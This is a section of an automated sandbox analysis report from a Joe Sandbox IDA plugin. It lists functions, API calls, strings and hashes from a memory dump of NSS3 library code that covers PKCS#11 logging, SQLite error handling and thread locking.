free.MOZGLUE(?), ref: 6CA6AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA6AEC7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 23de1f9bb05f91901773057709bd77567b9950f0a66bced86ef9bc752dd5876e
Instruction ID: 8fee539d77f594ff825d2ed54c25123bc3a2f9810943be96f429ff4a3249e787
Opcode Fuzzy Hash: 23de1f9bb05f91901773057709bd77567b9950f0a66bced86ef9bc752dd5876e
Instruction Fuzzy Hash: 65519DB4E01136DBDF00DFAAD8457AE77B5EB0A358F180025E815A3E00D331AE95CBE2

Function 6CAAADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CAAADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAAAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAAAE29

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAAAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAAAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAAAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CAAAEA0

Strings

hKey = 0x%x, xrefs: 6CAAAE62, 6CAAAE72
C_MessageSignInit, xrefs: 6CAAADE1
hSession = 0x%x, xrefs: 6CAAAE01, 6CAAAE11
(CK_INVALID_HANDLE), xrefs: 6CAAAE1F, 6CAAAE80

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 768c6177ab9cda372ab70a9e959db52ef3cac74cf4d34fae8654022a9f3d7d4f
Instruction ID: e77ccd3a3a0b9315e0e0b262216a1242e58305a7cd373c9d7bb24d6482a5558c
Opcode Fuzzy Hash: 768c6177ab9cda372ab70a9e959db52ef3cac74cf4d34fae8654022a9f3d7d4f
Instruction Fuzzy Hash: E03128356011A4BFCB108F94DC98FAE77B6AB46319F484039E9095BA01DB30AC89CF92

Function 6CAA9EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CAA9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA9F49

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAA9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6CAA9FC0

Strings

hKey = 0x%x, xrefs: 6CAA9F82, 6CAA9F92
C_MessageEncryptInit, xrefs: 6CAA9F01
hSession = 0x%x, xrefs: 6CAA9F21, 6CAA9F31
(CK_INVALID_HANDLE), xrefs: 6CAA9F3F, 6CAA9FA0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: f6743df1ed2dcb4875c6f77be780f178d537e11ff3a14c572e15163d156683f2
Instruction ID: 0a053c27d8ab09c2eb1525dc0047a767976f16d9d1941f3796fd6166e1096103
Opcode Fuzzy Hash: f6743df1ed2dcb4875c6f77be780f178d537e11ff3a14c572e15163d156683f2
Instruction Fuzzy Hash: 22312C356012D4ABCB00DFA4ED98FAE7775AB4A31CF084039F5095BA41D731AC8DCB92

Function 6CB44C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CB44CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB44CFD
sqlite3_value_text16.NSS3(?), ref: 6CB44D44

Strings

unknown error, xrefs: 6CB44D56
another row available, xrefs: 6CB44D20
out of memory, xrefs: 6CB44C78, 6CB44C9E
invalid, xrefs: 6CB44CF1
abort due to ROLLBACK, xrefs: 6CB44D27, 6CB44D33
bad parameter or other API misuse, xrefs: 6CB44D05
API call with %s database connection pointer, xrefs: 6CB44CF6
no more rows available, xrefs: 6CB44D2E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 8cc9d6ae63fa439df0e250e692da2111e1d9edb234e760223a3adec7b091eaa8
Instruction ID: 5de6e1a894a75f9f261894de917edb164a59b947994d09882c034ee7f54cf1cf
Opcode Fuzzy Hash: 8cc9d6ae63fa439df0e250e692da2111e1d9edb234e760223a3adec7b091eaa8
Instruction Fuzzy Hash: 6E317A72A0C8E1A7D7080E24A8117A57325F782319F19C125D8245BE5ECF21AC76AFE3

Function 6CAA2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CAA2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA2E33

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAA2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAA2E81

Strings

ulPinLen = %d, xrefs: 6CAA2E7C
hSession = 0x%x, xrefs: 6CAA2E0E, 6CAA2E1E
pPin = 0x%p, xrefs: 6CAA2E63
C_InitPIN, xrefs: 6CAA2DF1
(CK_INVALID_HANDLE), xrefs: 6CAA2E2C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 194fca0eea9d1c55030f9f408f01fa098ae1d529d4170b4384d7f6025fc5acb0
Instruction ID: 13b60b7ea21f2634cd42780cb43f35c3dbd39070e9c6d4737e773f8a980911d7
Opcode Fuzzy Hash: 194fca0eea9d1c55030f9f408f01fa098ae1d529d4170b4384d7f6025fc5acb0
Instruction Fuzzy Hash: 80313734602194ABCB208F55DD5CB5E7B75EB46318F084025E80CA7B11DB30ACDDCB92

Function 6CAA6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CAA6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA6F53

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAA6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CAA6FA1

Strings

pPart = 0x%p, xrefs: 6CAA6F83
hSession = 0x%x, xrefs: 6CAA6F2E, 6CAA6F3E
C_DigestUpdate, xrefs: 6CAA6F11
ulPartLen = %d, xrefs: 6CAA6F9C
(CK_INVALID_HANDLE), xrefs: 6CAA6F4C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 3c458b78dc59123fbcd215b5e877cdac0a7c4ad18639dcc553f1ccf25fdb90da
Instruction ID: 4350efd3b72d663a209cc7528ca1d22d8d852457d66adb07acbc28e19b75975f
Opcode Fuzzy Hash: 3c458b78dc59123fbcd215b5e877cdac0a7c4ad18639dcc553f1ccf25fdb90da
Instruction Fuzzy Hash: 0B31E734602194AFDB009B68ED58F9E7BB5EB46319F084035E80897B11DB30AD8DCB92

Function 6CAA7E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6CAA7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA7E63

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAA7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CAA7EB1

Strings

pPart = 0x%p, xrefs: 6CAA7E93
hSession = 0x%x, xrefs: 6CAA7E3E, 6CAA7E4E
C_VerifyUpdate, xrefs: 6CAA7E21
ulPartLen = %d, xrefs: 6CAA7EAC
(CK_INVALID_HANDLE), xrefs: 6CAA7E5C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: 78ba787bd28198b9f2c17fed92d7b43a00d2b45da63b96cd93232b565871367c
Instruction ID: 1b3bc8fd1f7240c4fff471f18241ab047f9937845b94be00256fbda53ddecc49
Opcode Fuzzy Hash: 78ba787bd28198b9f2c17fed92d7b43a00d2b45da63b96cd93232b565871367c
Instruction Fuzzy Hash: 0431FB34A02194AFDB109B64DD58F5F7BB5EB46319F084025E80997611DB30AD89CBD2

Function 6CA74880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA748A2
PORT_NewArena_Util.NSS3(00000800), ref: 6CA748C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6CA748D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6CA748FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6CA74908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA74947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CA7496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA74988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB98DAC,?), ref: 6CA749DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA749FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA74ACB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: b1689d898450a0a2a34a666030985073efe957d292f94f020a4cb7c507173268
Instruction ID: efd937be4ca51bc6116027842b6a17749c10f744aaafad94079ea9d7a9334211
Opcode Fuzzy Hash: b1689d898450a0a2a34a666030985073efe957d292f94f020a4cb7c507173268
Instruction Fuzzy Hash: 1C510379A043058BEF308F65DC41B9B37E8BF41308F184129E929AAB91E771D488CF76

Function 6CB42D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CB42D9F

Part of subcall function 6C9FCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA5F9C9,?,6CA5F4DA,6CA5F9C9,?,?,6CA2369A), ref: 6C9FCA7A
Part of subcall function 6C9FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9FCB26

sqlite3_exec.NSS3(?,?,6CB42F70,?,?), ref: 6CB42DF9
sqlite3_free.NSS3(00000000), ref: 6CB42E2C
sqlite3_free.NSS3(?), ref: 6CB42E3A
sqlite3_free.NSS3(?), ref: 6CB42E52
sqlite3_mprintf.NSS3(6CBAAAF9,?), ref: 6CB42E62
sqlite3_free.NSS3(?), ref: 6CB42E70
sqlite3_free.NSS3(?), ref: 6CB42E89
sqlite3_free.NSS3(?), ref: 6CB42EBB
sqlite3_free.NSS3(?), ref: 6CB42ECB
sqlite3_free.NSS3(00000000), ref: 6CB42F3E
sqlite3_free.NSS3(?), ref: 6CB42F4C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 2c43f0fdab7b0c8443b54886d5d99509509d1270df129b912865704960aa8997
Instruction ID: 8d8906e1556722e7fd96751936585b695fb02fb776cbcc9c58f8d1b00393714f
Opcode Fuzzy Hash: 2c43f0fdab7b0c8443b54886d5d99509509d1270df129b912865704960aa8997
Instruction Fuzzy Hash: D661A1B5E082558BEB00CFA8D884BDEB7B1EF58348F158028DC55E7705E735E845EBA2

Function 6CA92C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CA93F23,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92C62
EnterCriticalSection.KERNEL32(0000001C,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92C76
PL_HashTableLookup.NSS3(00000000,?,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92C93

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23,?), ref: 6CA92CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?,?,6CA93F23), ref: 6CA92CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?), ref: 6CA92CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA8E477,?,?,?,00000001,00000000,?), ref: 6CA92D4D
EnterCriticalSection.KERNEL32(?), ref: 6CA92D61
PL_HashTableLookup.NSS3(?,?), ref: 6CA92D71
PR_Unlock.NSS3(?), ref: 6CA92D7E

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: dad29f01698a55825f79da0ccb250a4a6b4cb03ac5865a9ee1b8b3c7bb1da5ca
Instruction ID: b147a9a60697ad1c72e207cc3423f94a7f1f384a89a32f5589a6f42fc779ca54
Opcode Fuzzy Hash: dad29f01698a55825f79da0ccb250a4a6b4cb03ac5865a9ee1b8b3c7bb1da5ca
Instruction Fuzzy Hash: 8C511975D10104ABDB019F34EC458AAB7B8FF1935CB088624EC1997B11E731EDA8C7E1

Function 6CA87C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBD2120,Function_00097E60,00000000,?,?,?,?,6CB0067D,6CB01C60,00000000), ref: 6CA87C81

Part of subcall function 6C9F4C70: TlsGetValue.KERNEL32(?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4C97
Part of subcall function 6C9F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CB0
Part of subcall function 6C9F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CC9

TlsGetValue.KERNEL32 ref: 6CA87CA0
EnterCriticalSection.KERNEL32(?), ref: 6CA87CB4
PR_Unlock.NSS3 ref: 6CA87CCF

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

TlsGetValue.KERNEL32 ref: 6CA87D04
EnterCriticalSection.KERNEL32(?), ref: 6CA87D1B
realloc.MOZGLUE(-00000050), ref: 6CA87D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA87DF4
PR_Unlock.NSS3 ref: 6CA87E0E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 02f02687a3f80a41f9fd5add264f2bbdfc7f1c5108778b0d38d5784e863db136
Instruction ID: 4c208b6f6f0e0ba33cb213c00c29706a73c3769f67cea93c8acf8ede0f2fff02
Opcode Fuzzy Hash: 02f02687a3f80a41f9fd5add264f2bbdfc7f1c5108778b0d38d5784e863db136
Instruction Fuzzy Hash: C351FFB1B461419BDF01AF28DC44B6577B5FB52318F19812AF914C7B22EB30A890CAA2

Function 6C9F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4D97
PR_Lock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4DBA
PR_WaitCondVar.NSS3 ref: 6C9F4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4DEF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
